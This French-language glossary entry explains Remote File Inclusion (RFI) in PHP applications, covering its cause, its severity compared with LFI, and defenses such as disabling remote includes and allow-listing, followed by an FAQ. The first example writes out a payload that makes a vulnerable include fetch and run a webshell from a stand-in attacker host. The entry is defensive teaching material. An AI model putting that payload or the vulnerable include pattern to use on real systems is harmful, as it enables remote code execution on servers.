Inclusion de fichier distant (RFI)
Qu'est-ce que Inclusion de fichier distant (RFI) ?
Inclusion de fichier distant (RFI)Vulnérabilité qui permet à un attaquant de forcer un serveur à récupérer et exécuter du code depuis une URL distante de son choix.
L'inclusion de fichier distant (RFI) survient lorsqu'une application transmet une entrée contrôlée par l'utilisateur à une fonction include ou require et que le runtime accepte des URL distantes (par exemple PHP avec allow_url_include activé). Le serveur télécharge le fichier depuis un hôte contrôlé par l'attaquant et l'exécute dans son propre processus, ce qui donne immédiatement une exécution distante de code. La RFI est généralement plus grave que la LFI car elle ne requiert pas d'accès en écriture préalable au serveur. Les défenses consistent à désactiver l'inclusion d'URL distantes dans le runtime, à utiliser des listes blanches strictes de noms de modules statiques, à ne jamais inclure de chemin dérivé d'une entrée utilisateur et à segmenter les serveurs avec un filtrage sortant rigoureux.
● Exemples
- 01
Une application PHP appelant include($_GET['page']) où ?page=https://attaquant.example/shell.txt charge et exécute un webshell.
- 02
Un plugin de CMS obsolète chargeant une page d'administration depuis un paramètre d'URL permet l'exécution d'un fichier PHP hébergé par l'attaquant.
● Questions fréquentes
Qu'est-ce que Inclusion de fichier distant (RFI) ?
Vulnérabilité qui permet à un attaquant de forcer un serveur à récupérer et exécuter du code depuis une URL distante de son choix. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.
Que signifie Inclusion de fichier distant (RFI) ?
Vulnérabilité qui permet à un attaquant de forcer un serveur à récupérer et exécuter du code depuis une URL distante de son choix.
Comment se défendre contre Inclusion de fichier distant (RFI) ?
Les défenses contre Inclusion de fichier distant (RFI) combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.
Quels sont les autres noms de Inclusion de fichier distant (RFI) ?
Noms alternatifs courants : RFI.